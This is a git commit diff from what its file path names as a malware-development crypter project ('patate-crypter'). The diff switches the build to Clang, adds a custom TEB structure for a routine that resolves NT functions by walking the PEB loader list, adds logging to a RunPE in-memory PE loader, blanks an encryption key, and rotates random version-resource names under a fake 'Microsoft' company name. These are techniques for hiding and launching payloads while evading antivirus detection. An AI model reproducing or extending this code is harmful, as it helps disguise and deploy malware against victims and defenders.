add: clang integration
This commit is contained in:
@@ -1,2 +1,2 @@
|
|||||||
#pragma once
|
#pragma once
|
||||||
#define KEY "ougoqugduzqd"
|
#define KEY ""
|
||||||
@@ -1,3 +1,5 @@
|
|||||||
|
typedef struct IUnknown IUnknown;
|
||||||
|
|
||||||
#include <windows.h>
|
#include <windows.h>
|
||||||
#include <cstdio>
|
#include <cstdio>
|
||||||
#include <iostream>
|
#include <iostream>
|
||||||
@@ -91,13 +93,25 @@ typedef NTSTATUS (NTAPI *NtAllocateVirtualMemoryPtr)(HANDLE ProcessHandle, PVOID
|
|||||||
typedef NTSTATUS (NTAPI *LdrLoadDllPtr)(PWCHAR, ULONG, PUNICODE_STRING, PHANDLE);
|
typedef NTSTATUS (NTAPI *LdrLoadDllPtr)(PWCHAR, ULONG, PUNICODE_STRING, PHANDLE);
|
||||||
typedef NTSTATUS (NTAPI *RtlInitUnicodeStringPtr)(PUNICODE_STRING DestinationString, PCWSTR SourceString);
|
typedef NTSTATUS (NTAPI *RtlInitUnicodeStringPtr)(PUNICODE_STRING DestinationString, PCWSTR SourceString);
|
||||||
|
|
||||||
|
typedef struct __TEB {
|
||||||
|
PVOID Reserved1[12];
|
||||||
|
PPEB ProcessEnvironmentBlock;
|
||||||
|
PVOID Reserved2[399];
|
||||||
|
BYTE Reserved3[1952];
|
||||||
|
PVOID TlsSlots[64];
|
||||||
|
BYTE Reserved4[8];
|
||||||
|
PVOID Reserved5[26];
|
||||||
|
PVOID ReservedForOle;
|
||||||
|
PVOID Reserved6[4];
|
||||||
|
PVOID TlsExpansionSlots;
|
||||||
|
} TEB_, * PTEB_;
|
||||||
|
|
||||||
void* get_ntfunction(const char* func) {
|
void* get_ntfunction(const char* func) {
|
||||||
//START
|
//START
|
||||||
#ifdef _M_X64
|
#ifdef _M_X64
|
||||||
PTEB tebPtr = reinterpret_cast<PTEB>(__readgsqword(reinterpret_cast<DWORD_PTR>(&static_cast<NT_TIB*>(nullptr)->Self)));
|
PTEB_ tebPtr = reinterpret_cast<PTEB_>(__readgsqword(reinterpret_cast<DWORD_PTR>(&static_cast<NT_TIB*>(nullptr)->Self)));
|
||||||
#else
|
#else
|
||||||
PTEB tebPtr = reinterpret_cast<PTEB>(__readfsdword(reinterpret_cast<DWORD_PTR>(&static_cast<NT_TIB*>(nullptr)->Self)));
|
PTEB_ tebPtr = reinterpret_cast<PTEB_>(__readfsdword(reinterpret_cast<DWORD_PTR>(&static_cast<NT_TIB*>(nullptr)->Self)));
|
||||||
#endif
|
#endif
|
||||||
|
|
||||||
PPEB_LDR_DATA ldrData = tebPtr->ProcessEnvironmentBlock->Ldr;
|
PPEB_LDR_DATA ldrData = tebPtr->ProcessEnvironmentBlock->Ldr;
|
||||||
@@ -154,6 +168,7 @@ HMODULE RunPE(const void* dll_buffer, size_t dll_size, DWORD newBase)
|
|||||||
return NULL;
|
return NULL;
|
||||||
}
|
}
|
||||||
|
|
||||||
|
DEBUG_PRINTF("[+] Allocated memory at 0x%p\n", image_base);
|
||||||
const IMAGE_SECTION_HEADER* section_headers = reinterpret_cast<const IMAGE_SECTION_HEADER*>(nt_headers + 1);
|
const IMAGE_SECTION_HEADER* section_headers = reinterpret_cast<const IMAGE_SECTION_HEADER*>(nt_headers + 1);
|
||||||
// Copy the section data to the allocated memory.
|
// Copy the section data to the allocated memory.
|
||||||
for (WORD i = 0; i < nt_headers->FileHeader.NumberOfSections; ++i) {
|
for (WORD i = 0; i < nt_headers->FileHeader.NumberOfSections; ++i) {
|
||||||
|
|||||||
@@ -68,12 +68,12 @@ BEGIN
|
|||||||
BLOCK "040c04b0"
|
BLOCK "040c04b0"
|
||||||
BEGIN
|
BEGIN
|
||||||
VALUE "CompanyName", "Microsoft"
|
VALUE "CompanyName", "Microsoft"
|
||||||
VALUE "FileDescription", "cixctkirmfubayfzkbog"
|
VALUE "FileDescription", "dnsfzllrjwhkcwdfijbb"
|
||||||
VALUE "FileVersion", "1.0.0.1"
|
VALUE "FileVersion", "1.0.0.1"
|
||||||
VALUE "InternalName", "bcjphkt.exe"
|
VALUE "InternalName", "fbjriet.exe"
|
||||||
VALUE "LegalCopyright", "Copyright (C) 2023"
|
VALUE "LegalCopyright", "Copyright (C) 2023"
|
||||||
VALUE "OriginalFilename", "nybxftw.exe"
|
VALUE "OriginalFilename", "pvgcwpf.exe"
|
||||||
VALUE "ProductName", "txwfqte.exe"
|
VALUE "ProductName", "wisjfvx.exe"
|
||||||
VALUE "ProductVersion", "1.0.0.1"
|
VALUE "ProductVersion", "1.0.0.1"
|
||||||
END
|
END
|
||||||
END
|
END
|
||||||
@@ -83,7 +83,7 @@ BEGIN
|
|||||||
END
|
END
|
||||||
END
|
END
|
||||||
|
|
||||||
MAINICON ICON "C:/Users/patate/Desktop/Programmation/C++/Maldev/patate-crypter/icon.ico"
|
//MAINICON ICON ""
|
||||||
#endif
|
#endif
|
||||||
/////////////////////////////////////////////////////////////////////////////
|
/////////////////////////////////////////////////////////////////////////////
|
||||||
|
|
||||||
|
|||||||
@@ -29,26 +29,26 @@
|
|||||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
|
||||||
<ConfigurationType>Application</ConfigurationType>
|
<ConfigurationType>Application</ConfigurationType>
|
||||||
<UseDebugLibraries>true</UseDebugLibraries>
|
<UseDebugLibraries>true</UseDebugLibraries>
|
||||||
<PlatformToolset>v143</PlatformToolset>
|
<PlatformToolset>ClangCL</PlatformToolset>
|
||||||
<CharacterSet>MultiByte</CharacterSet>
|
<CharacterSet>MultiByte</CharacterSet>
|
||||||
</PropertyGroup>
|
</PropertyGroup>
|
||||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
|
||||||
<ConfigurationType>Application</ConfigurationType>
|
<ConfigurationType>Application</ConfigurationType>
|
||||||
<UseDebugLibraries>false</UseDebugLibraries>
|
<UseDebugLibraries>false</UseDebugLibraries>
|
||||||
<PlatformToolset>v143</PlatformToolset>
|
<PlatformToolset>ClangCL</PlatformToolset>
|
||||||
<WholeProgramOptimization>false</WholeProgramOptimization>
|
<WholeProgramOptimization>false</WholeProgramOptimization>
|
||||||
<CharacterSet>MultiByte</CharacterSet>
|
<CharacterSet>MultiByte</CharacterSet>
|
||||||
</PropertyGroup>
|
</PropertyGroup>
|
||||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
|
||||||
<ConfigurationType>Application</ConfigurationType>
|
<ConfigurationType>Application</ConfigurationType>
|
||||||
<UseDebugLibraries>true</UseDebugLibraries>
|
<UseDebugLibraries>true</UseDebugLibraries>
|
||||||
<PlatformToolset>v143</PlatformToolset>
|
<PlatformToolset>ClangCL</PlatformToolset>
|
||||||
<CharacterSet>MultiByte</CharacterSet>
|
<CharacterSet>MultiByte</CharacterSet>
|
||||||
</PropertyGroup>
|
</PropertyGroup>
|
||||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
|
||||||
<ConfigurationType>Application</ConfigurationType>
|
<ConfigurationType>Application</ConfigurationType>
|
||||||
<UseDebugLibraries>false</UseDebugLibraries>
|
<UseDebugLibraries>false</UseDebugLibraries>
|
||||||
<PlatformToolset>v143</PlatformToolset>
|
<PlatformToolset>ClangCL</PlatformToolset>
|
||||||
<WholeProgramOptimization>false</WholeProgramOptimization>
|
<WholeProgramOptimization>false</WholeProgramOptimization>
|
||||||
<CharacterSet>MultiByte</CharacterSet>
|
<CharacterSet>MultiByte</CharacterSet>
|
||||||
</PropertyGroup>
|
</PropertyGroup>
|
||||||
|
|||||||
Reference in New Issue
Block a user